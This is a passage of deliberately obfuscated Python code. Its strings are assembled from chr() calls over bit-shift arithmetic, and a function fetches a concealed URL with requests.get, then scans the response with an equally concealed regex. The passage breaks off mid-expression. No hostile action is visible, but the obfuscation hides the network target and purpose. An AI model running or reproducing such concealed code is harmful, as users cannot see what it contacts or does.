g+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu),(_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))]));________tpudpazdftcn=str("".join(chr(__RSV) for __RSV in [(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu),((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu)]));_________ocrgugcogovp=str("".join(chr(__RSV) for __RSV in [(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),(___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu),((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu)]))
def __________xrwpikstqlrz():
try :
global ___________onielzvjdokg
global ____________gwbahwaesaqz
_____________bgsgtttfdbfg=requests.get(str("".join(chr(__RSV) for __RSV in [((____nthikhotjssa<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+(_____chsqpefvmbxg<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+(______ttwxoebqsbsu<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu),(_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))])), headers = headers , timeout =((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))))
_____________bgsgtttfdbfg=content_Fox(_____________bgsgtttfdbfg)
if (re.findall(re.compile(str("".join(chr(__RSV) for __RSV in [(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu